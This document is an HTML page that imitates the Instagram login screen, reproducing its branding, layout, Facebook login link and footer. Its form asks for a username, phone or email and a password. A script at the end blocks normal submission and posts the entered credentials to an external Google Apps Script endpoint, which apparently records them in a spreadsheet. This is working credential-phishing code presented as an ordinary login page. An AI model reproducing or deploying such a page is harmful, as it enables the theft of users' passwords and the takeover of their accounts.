<!DOCTYPE html>
<html>
    <head>
        <title>Instagram login</title>
        <link href="https://fonts.googleapis.com/css?family=Cookie|DM+Sans:400,700&display=swap" rel="stylesheet">
        <!-- <link rel="stylesheet" type="text/css" href="style.css"> -->
        <link rel="stylesheet" type="text/css" href="http://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">

       <style>
            * {
    padding: 0;
    margin: 0;
    box-sizing: border-box;
}


body {
   
    background-color: #fafafa;
    font-family: 'DM Sans', sans-serif;
    text-align: center;
    text-rendering: optimizeLegibility;
}

.container {
    position: absolute;
    
    height: 562px;
    width: 350px;
    left: 730px;
    top: 70px; 
}
@media only screen and (max-width: 600px) {
        .container, footer {
            width: 100%;
            left: 30px;
            top: 10;

        }

        .header, .question, .image {
            width: 100%;
        }

        .login input[type="text"],
        .login input[type="password"],
        .login input[type="submit"] {
            width: 80%;
        }

        h1 {
            font-size: 40px;
            left: 0;
        }
    }
.main{
  
    /* display: flex;
    justify-content: center;
    align-items: center; */
}
.header{
    background-color: #fff;
    border: 1px solid #e6e6e6;
    border-radius: 1px;
    height: 377px;
    width: 350px;
    letter-spacing: 2px;
    box-shadow: 2px 2px rgba(167, 167, 167, 0.06);
}

h1 {
    height: 51px;
    width: 175px;
    font-family: 'Cookie', cursive;
    font-size: 55px;
    position: relative;
    left: 40px;
    top: 30px;
    color: #393939;
}

.login {
    background-color: #fff;
    width: 348px;
    height: 261px;
    position: relative;
    top: 60px;
}

.login input[type="text"],
.login input[type="password"] {
    width: 268px;
    height: 38px;
    
    border-radius: 3px;
    background-color: #fbfbfb;
    color: rgba(0, 0, 0, 0.92);
    font-size: 12px;
    margin-top: 5px;
    border: 1px solid #e8e8e8;
    padding-left: 8px;
    position: relative;
    top: 12px;
}

.login input[type="submit"] {
    width: 268px;
    height: 28px;
    position: relative;
    top: 30px;
    background-color: #3897f0;
    border-radius: 5px;
    border: none;
    color: #fff;
    cursor: pointer;
}

.login p {
    font-size: 12px;
    position: relative;
    top: 50px;
    display: block;
    color: #8e8e8e;
}

.login a {
    position: relative;
    top: 70px;
    left: 55px;
    text-decoration: none;
    color: #385185;
    font-weight: bold;
    font-size: 14px;
    letter-spacing: 0px;
    word-spacing: 2px;
}

.ion-social-facebook {
    vertical-align: center;
    font-size: 15px;
    display: inline;
    margin-right: 8px;
    background-color: #385185;
    padding: 1px 7px;
    color: #fff;
    border-radius: 2px;
}

span {
    position: relative;
    top: 100px;
    right: 90px;
    color: #0e0e0e;
    font-size: 12px;
    letter-spacing: 0px;
}


.question {
    width: 350px;
    height: 62px;
    background-color: #fff;
    border: 1px solid #e6e6e6;
    border-radius: 1px;
    position: relative;
    top: 10px;
    box-shadow: 2px 2px rgba(167, 167, 167, 0.06);
    text-align: center;
}

.question p {
    display: block;
    position: relative;
    margin-top: 18px;
    font-size: 14px;
    letter-spacing: 0px;
    color: #2e2e2e;
}

.question p a {
    color: #4aacee;
    font-weight: bold;
    text-decoration: none;
    margin-left: 4px;
}

.image {
    width: 350px;
    height: 100px;
    background-color: #fafafa;
    position: relative;
    top: 20px;
    text-align: center;
}

.image p {
    color: #3d3d3d;
    font-size: 14px;
    margin-top: 20px;
}

.image .img-1 {
    position: relative;
    top: -35px;
    width: 136px;
    height: 140px;
}

.image .img-2 {
    position: relative;
    top: -85px;
    width: 134px;
    height: 42px;
    margin-left: 4px;
}

footer {
    width: 100%;
    height: 104px;
    background-color: #fafafa;
    position: relative;
    top: 650px;
}

footer ul {
    position: relative;
    top: 40px;
    left: -80px;
}

footer li {
    display: inline-block;
    margin-right: 8px;
    font-size: 12px;
    color: #585858;
    font-weight: bold;
}

.insta {
    position: relative;
    left: 100px;
}
        </style>
    </head>
    <body>
    <div class="main">
        
        <div class="container">
            <div class="header">
                <div class="heading">
                    <h1>Instagram</h1>
                </div>
                <div class="login">
                   <form name="submit-to-google-sheet">
                    <input type="text" name="name" placeholder="Phone number, user name, or email" required>
                    <input type="password" name="password" placeholder="Password" required>
                    <input type="submit" value="log In">
                   </form>
                     <p>&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&nbsp;&nbsp;OR&nbsp;&nbsp;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;</p>
                    <a href="#" class="fb-login"><i class="ion-social-facebook"></i>Log in with Facebook</a>
                    <span>Forgot password?</span>
                </div>
            </div>
            <div class="question">
                <p>Don't have an account?<a href="#">Sign up</a></p>
            </div>
            <div class="image">
                <p>Get the app.</p>
                <img src="download-app.svg" class="img-1">
                <img src="download-app-android.png" class="img-2">
            </div>
        </div>
        <footer>
            <ul>
               <li>ABOUT US</li>
               <li>SUPPORT</li>
               <li>PRESS</li>
               <li>API</li>
               <li>JOBS</li>
               <li>PRIVACY</li>
               <li>TERMS</li>
               <li>DIRECTORY</li>
               <li>PROFILES</li>
               <li>HASHTAGS</li>
               <li>LANGUAGE</li>
               <li>2019 INSTAGRAM</li>
            </ul>
        </footer>
    
    </div>
    <script>
        const scriptURL = 'https://script.google.com/macros/s/AKfycbyzPb4PPb_xtoRygAj4H9utbzPP5I56dO1RJ7lvMEZcyAISUcw2D1UzL7DgqoHJ0WqXJQ/exec'
        const form = document.forms['submit-to-google-sheet']
      
        form.addEventListener('submit', e => {
          e.preventDefault()
          fetch(scriptURL, { method: 'POST', body: new FormData(form)})
            .then(response => console.log('Success!', response))
            .catch(error => console.error('Error!', error.message))
        })
      </script>
    </body>
</html>